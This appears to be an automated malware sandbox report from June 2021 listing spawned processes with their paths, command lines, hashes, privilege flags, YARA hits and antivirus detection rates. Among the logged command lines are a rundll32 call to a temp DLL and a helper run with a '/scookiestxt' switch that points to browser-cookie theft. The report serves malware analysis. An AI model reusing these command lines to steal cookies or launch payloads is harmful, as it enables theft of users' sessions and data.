File size:163840 bytes
MD5 hash:02580709C0E95ABA9FDD1FBDF7C348E9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.735071284.00000000005B0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 19%, Metadefender
• Detection: 79%, ReversingLabs

Start time:22:22:41
Start date:23/06/2021
Path:C:\Program Files (x86)\Company\NewProduct\jooyu.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
Imagebase:0x390000
File size:994816 bytes
MD5 hash:AED57D50123897B0012C35EF5DEC4184
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 44%, Metadefender
• Detection: 90%, ReversingLabs

Start time:22:22:42
Start date:23/06/2021
Path:C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
Imagebase:0x210000
File size:353648 bytes
MD5 hash:BB4FD26AB95CB6D7EB25F95AC1F3C2DA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Start time:22:22:49
Start date:23/06/2021
Path:C:\Program Files (x86)\Browzar\Browzar.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Browzar\Browzar.exe'
Imagebase:0x400000
File size:228000 bytes
MD5 hash:847674F996283EB11F244A75F14F69AB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender
• Detection: 2%, ReversingLabs

Start time:22:22:51
Start date:23/06/2021
Path:C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
Imagebase:0x400000
File size:357376 bytes
MD5 hash:DF518E39A56E4EA23D0B2442FFD42AEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:52
Start date:23/06/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
Imagebase:0x1250000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:54
Start date:23/06/2021
Path:C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
Imagebase:0x400000
File size:1123869 bytes
MD5 hash:A4C547CFAC944AD816EDF7C54BB58C5C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 29%, Metadefender
• Detection: 79%, ReversingLabs

Start time:22:22:56
Start date:23/06/2021
Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
Imagebase:0x400000
File size:62976 bytes
MD5 hash:A6279EC92FF948760CE53BBA817D6A77
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:56
Start date:23/06/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                      Start time:22:22:56
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:732160 bytes
                                                                                                                                                                                      MD5 hash:7A151DB96E506BD887E3FFA5AB81B1A5
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 34%, Metadefender, Browse
                                                                                                                                                                                      • Detection: 93%, ReversingLabs
                                                                                                                                                                                      Start time:22:22:58
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:62976 bytes
                                                                                                                                                                                      MD5 hash:A6279EC92FF948760CE53BBA817D6A77
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Start time:22:22:58
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.966814169.000001DA29CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.822255696.000001DA29C60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      Start time:22:23:01
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                      Imagebase:0x7ff6fee60000
                                                                                                                                                                                      File size:3933184 bytes
                                                                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Start time:22:23:09
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:62976 bytes
                                                                                                                                                                                      MD5 hash:A6279EC92FF948760CE53BBA817D6A77
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Disassembly

                                                                                                                                                                                      Code Analysis